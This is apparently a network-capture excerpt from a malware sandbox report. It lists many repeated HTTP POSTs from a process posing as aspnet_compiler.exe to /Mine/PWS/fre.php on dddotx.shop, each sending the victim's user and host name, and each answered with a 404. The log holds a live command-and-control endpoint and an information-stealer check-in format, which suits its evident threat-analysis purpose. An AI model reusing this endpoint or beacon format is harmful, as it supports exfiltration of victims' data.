Sep 25, 2024 15:29:21.686429024 CEST	573	IN	HTTP/1.1 404 Not Found Date: Wed, 25 Sep 2024 13:29:21 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Cd%2BfFcMh2A%2FZGKQ%2FZaHKDfXXajx3RHwxnh5BdIZV1fZi4Nn8zVydkmHeamxp7AcUMm%2BJDlMQf4wmWb2jWe8jwwBhpMO5CSREM%2FdwPff5QN9vrC%2FentMgTCuhIb1ZAw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c8b5cd2b9487cf9-EWR Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
50	192.168.2.4	55925	188.114.96.3	80	6880	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Sep 25, 2024 15:29:21.871562958 CEST	240	OUT	POST /Mine/PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: dddotx.shop Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 925F43C2 Content-Length: 149 Connection: close
Sep 25, 2024 15:29:21.877332926 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones134349JONES-PC0FDD42EE188E931437F4FBE2C
Sep 25, 2024 15:29:22.673975945 CEST	567	IN	HTTP/1.1 404 Not Found Date: Wed, 25 Sep 2024 13:29:22 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=XV6BrJcsazT9zE0dwdBUaAGVU2cAo8SuOv9K7gGhstYEZtjJvdiYWt12Lc9VRDSXX%2Fy3RB1U7JRqomkxB0GzptYkbYdXN%2BrkSYEMIDO7rMirXBSvt8QSOvmiK5C%2B9w%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c8b5cda3e9142cf-EWR Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
51	192.168.2.4	55926	188.114.96.3	80	6880	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Sep 25, 2024 15:29:22.961080074 CEST	240	OUT	POST /Mine/PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: dddotx.shop Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 925F43C2 Content-Length: 149 Connection: close
Sep 25, 2024 15:29:22.966391087 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones134349JONES-PC0FDD42EE188E931437F4FBE2C
Sep 25, 2024 15:29:23.753916025 CEST	565	IN	HTTP/1.1 404 Not Found Date: Wed, 25 Sep 2024 13:29:23 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=AsATlgmJbQqTrJ4HJ1piEoXJGeObj7OAX7TMIjn1Hzv0jiOjK5kOzY6IIORurRR%2FA8NepUojq9Asm9yXrqwFw0u%2FH7fRKHJGQ9BikCTZoOjN2IhFdm1GqH0d5LaLoQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c8b5ce10db55e71-EWR Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
52	192.168.2.4	55927	188.114.96.3	80	6880	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Sep 25, 2024 15:29:23.923665047 CEST	240	OUT	POST /Mine/PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: dddotx.shop Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 925F43C2 Content-Length: 149 Connection: close
Sep 25, 2024 15:29:23.928498030 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones134349JONES-PC0FDD42EE188E931437F4FBE2C
Sep 25, 2024 15:29:24.755846024 CEST	565	IN	HTTP/1.1 404 Not Found Date: Wed, 25 Sep 2024 13:29:24 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=E1MnEgN0mFEU5Fky3%2Fw5npF1Q1dCugFbxbLCxsOjw5GQuGGBHLPaxIvwXNcB%2BqTYKShTQvrZpWSbCESCEEGU2EMjbzhhPx3OL1RhEHrknEvhZHcFegQFYkLOXdNmgQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c8b5ce728df8c6f-EWR Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
53	192.168.2.4	55928	188.114.96.3	80	6880	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Sep 25, 2024 15:29:24.916723967 CEST	240	OUT	POST /Mine/PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: dddotx.shop Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 925F43C2 Content-Length: 149 Connection: close
Sep 25, 2024 15:29:24.921644926 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones134349JONES-PC0FDD42EE188E931437F4FBE2C
Sep 25, 2024 15:29:26.878097057 CEST	569	IN	HTTP/1.1 404 Not Found Date: Wed, 25 Sep 2024 13:29:26 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=q4BHhqcH%2Fyoa5%2FkRcibFslv2VY0SMK%2Bvznf1Ba1Alrx4Osk12VfRctXkT7WTLvChVhcV2N1k%2BECdRoqk8KrM9XPB6oElPIeqsUjA6u7nGfpcNgm6LR3w3A7nS4Oe4g%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c8b5ced3c1f15c3-EWR Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
54	192.168.2.4	55929	188.114.96.3	80	6880	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Sep 25, 2024 15:29:27.050617933 CEST	240	OUT	POST /Mine/PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: dddotx.shop Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 925F43C2 Content-Length: 149 Connection: close
Sep 25, 2024 15:29:27.055675030 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones134349JONES-PC0FDD42EE188E931437F4FBE2C
Sep 25, 2024 15:29:27.707496881 CEST	567	IN	HTTP/1.1 404 Not Found Date: Wed, 25 Sep 2024 13:29:27 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=nBMJGDhIZ%2F9aSBWnYLvsdnaDT015GCje4O7mFdLQNh7Wg%2BhRx2YZOvqjwSZlzrZS1EAfbtagekv8fiTvwn6nPWU5TalsUlXarTjPjklf%2BLZtCH2eN3KWWpYJDQWhTA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c8b5cfa9aed8c90-EWR Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
55	192.168.2.4	55931	188.114.96.3	80	6880	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Sep 25, 2024 15:29:27.864459991 CEST	240	OUT	POST /Mine/PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: dddotx.shop Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 925F43C2 Content-Length: 149 Connection: close
Sep 25, 2024 15:29:27.870220900 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones134349JONES-PC0FDD42EE188E931437F4FBE2C
Sep 25, 2024 15:29:28.622564077 CEST	565	IN	HTTP/1.1 404 Not Found Date: Wed, 25 Sep 2024 13:29:28 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=63zgE5drxHCH9jQ4U4Fw82xXgeWFeMrky00UeX1eY0DkoUmAdh9fJEgaX5OTIQYRkkFsvbi0%2FdotyByksK4fv%2BqBFao0utRgXzEUq4GzfnAymW9iPUpMJcfqVdp8eA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c8b5cffbded4346-EWR Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
56	192.168.2.4	55932	188.114.96.3	80	6880	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Sep 25, 2024 15:29:28.937855959 CEST	240	OUT	POST /Mine/PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: dddotx.shop Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 925F43C2 Content-Length: 149 Connection: close
Sep 25, 2024 15:29:28.942773104 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones134349JONES-PC0FDD42EE188E931437F4FBE2C
Sep 25, 2024 15:29:29.615843058 CEST	569	IN	HTTP/1.1 404 Not Found Date: Wed, 25 Sep 2024 13:29:29 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=6FpLvkziSSC6Eh8wxbf42gNsezX7Xfw2ds4UM%2BGHQZNmsFMlatvtAGS3cHMzDIXHgloaJcLa1plcUvqU%2BI3FgIxgTONLRkg%2FjVHMbL%2BuKhuAqA6a5FBSnDdkLwFEWw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c8b5d065a124252-EWR Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
57	192.168.2.4	55933	188.114.96.3	80	6880	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Sep 25, 2024 15:29:29.772151947 CEST	240	OUT	POST /Mine/PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: dddotx.shop Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 925F43C2 Content-Length: 149 Connection: close
Sep 25, 2024 15:29:29.777252913 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones134349JONES-PC0FDD42EE188E931437F4FBE2C
Sep 25, 2024 15:29:30.430428028 CEST	571	IN	HTTP/1.1 404 Not Found Date: Wed, 25 Sep 2024 13:29:30 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=me13Y31WAhmfT9FVxH36LNpfIdG80k8d0p8sXIEwrLroqQRom4ukzBeVF%2FzauvSD1B1f6x8O0N%2Fe9Jk%2BqQkzkGGKQdhtAmE%2FEv8kMAhjCsux1O%2BN3vLMI0J92aFoaQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c8b5d0b9bb5335a-EWR Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
58	192.168.2.4	55934	188.114.96.3	80	6880	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Sep 25, 2024 15:29:30.582592964 CEST	240	OUT	POST /Mine/PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: dddotx.shop Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 925F43C2 Content-Length: 149 Connection: close
Sep 25, 2024 15:29:30.591674089 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones134349JONES-PC0FDD42EE188E931437F4FBE2C
Sep 25, 2024 15:29:31.557198048 CEST	563	IN	HTTP/1.1 404 Not Found Date: Wed, 25 Sep 2024 13:29:31 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=MMzvFkAjBl9JIFzELm1ZTMO13IkZi31yX2isW869fdfrPvf5Dh3QYwgAVPsaLZGKKJ3YJuA1t7r9JGrwGdqdYETW5SWnrCbcid%2BiPsnMMFEruhtLYeJmQ7YM5JNolw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c8b5d10bb9b7cfc-EWR Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Sep 25, 2024 15:29:31.559910059 CEST	563	IN	HTTP/1.1 404 Not Found Date: Wed, 25 Sep 2024 13:29:31 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=MMzvFkAjBl9JIFzELm1ZTMO13IkZi31yX2isW869fdfrPvf5Dh3QYwgAVPsaLZGKKJ3YJuA1t7r9JGrwGdqdYETW5SWnrCbcid%2BiPsnMMFEruhtLYeJmQ7YM5JNolw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c8b5d10bb9b7cfc-EWR Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
59	192.168.2.4	55935	188.114.96.3	80	6880	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Sep 25, 2024 15:29:31.899652958 CEST	240	OUT	POST /Mine/PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: dddotx.shop Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 925F43C2 Content-Length: 149 Connection: close
Sep 25, 2024 15:29:31.906769991 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones134349JONES-PC0FDD42EE188E931437F4FBE2C
Sep 25, 2024 15:29:32.623945951 CEST	569	IN	HTTP/1.1 404 Not Found Date: Wed, 25 Sep 2024 13:29:32 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=B0UehFcoHGJpvENXvInstUHfOrGu%2BwfCQ%2FvNPjiw3qZ6B4N4fXAYBNXvmtQVLPAB0WzD3jcqkf7XvLa2kHq%2BZg7k2he0DP1jtx0Lh%2FojpxGFRGo4UENzb0h8uaCiVA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c8b5d18ed0041ef-EWR Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
60	192.168.2.4	55936	188.114.96.3	80	6880	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Sep 25, 2024 15:29:32.792078972 CEST	240	OUT	POST /Mine/PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: dddotx.shop Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 925F43C2 Content-Length: 149 Connection: close
Sep 25, 2024 15:29:32.797954082 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones134349JONES-PC0FDD42EE188E931437F4FBE2C
Sep 25, 2024 15:29:33.508528948 CEST	569	IN	HTTP/1.1 404 Not Found Date: Wed, 25 Sep 2024 13:29:33 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=yAWD3b30w%2Fi21QMhcKkxdoso40gNLQlTpFADVa52xbRGhOJF8p9l2H%2B55XjRDLYp43bmUpE8CqvB62wD1uC6FgfH1M%2Fsko2TW%2Bp35jcuzH4bCGmGqVvnDNzanTk5kw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c8b5d1e7d92438a-EWR Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
61	192.168.2.4	55937	188.114.96.3	80	6880	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Sep 25, 2024 15:29:33.658562899 CEST	240	OUT	POST /Mine/PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: dddotx.shop Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 925F43C2 Content-Length: 149 Connection: close
Sep 25, 2024 15:29:33.663752079 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones134349JONES-PC0FDD42EE188E931437F4FBE2C
Sep 25, 2024 15:29:34.368746996 CEST	569	IN	HTTP/1.1 404 Not Found Date: Wed, 25 Sep 2024 13:29:34 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=FnHz6aVVyPIp%2FL4wUj%2BYuwTslJMjiuEoLGWo1B5iOD1e3UtZnGXSPI48eQ%2BKChsAbxda6BNyF0UKR%2Bk7nuHESEWuVIUWgPXiw0MGgM6VZNAcFvJq8spmYEIkbuxOdg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c8b5d23ddc40c90-EWR Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
62	192.168.2.4	55938	188.114.96.3	80	6880	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Sep 25, 2024 15:29:34.514517069 CEST	240	OUT	POST /Mine/PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: dddotx.shop Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 925F43C2 Content-Length: 149 Connection: close
Sep 25, 2024 15:29:34.519787073 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones134349JONES-PC0FDD42EE188E931437F4FBE2C
Sep 25, 2024 15:29:35.193804026 CEST	569	IN	HTTP/1.1 404 Not Found Date: Wed, 25 Sep 2024 13:29:35 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=mV1Fb723itILU95SlMngf6iW8Xl5jyKV1tBrLOPFcHiXGsyBRHoN2nmwjrFoG8HcO1bcbBvmgk%2FRcW02EuzvU1gAZv%2FKUMXV8mMdTEWmT8EsmoDH%2FISHM4Z5%2BZbq3g%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c8b5d295bdd42f8-EWR Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
63	192.168.2.4	55939	188.114.96.3	80	6880	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Sep 25, 2024 15:29:35.347440004 CEST	240	OUT	POST /Mine/PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: dddotx.shop Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 925F43C2 Content-Length: 149 Connection: close
Sep 25, 2024 15:29:35.353458881 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones134349JONES-PC0FDD42EE188E931437F4FBE2C
Sep 25, 2024 15:29:36.042773962 CEST	569	IN	HTTP/1.1 404 Not Found Date: Wed, 25 Sep 2024 13:29:35 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=oYfbhEoHVCAojQNhIxycqgCkGHXKbNViPzFkztkB0gXI34b0uQVa2VrwsGKyHYXr3usWGybs0OaqHAs8Sqzg84ehPA0rgPlw%2Bsbd%2FMfHpPEP2fIOtoN%2Bv3%2FogE4JPA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c8b5d2e8bb90f81-EWR Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
64	192.168.2.4	55940	188.114.96.3	80	6880	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Sep 25, 2024 15:29:36.187341928 CEST	240	OUT	POST /Mine/PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: dddotx.shop Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 925F43C2 Content-Length: 149 Connection: close
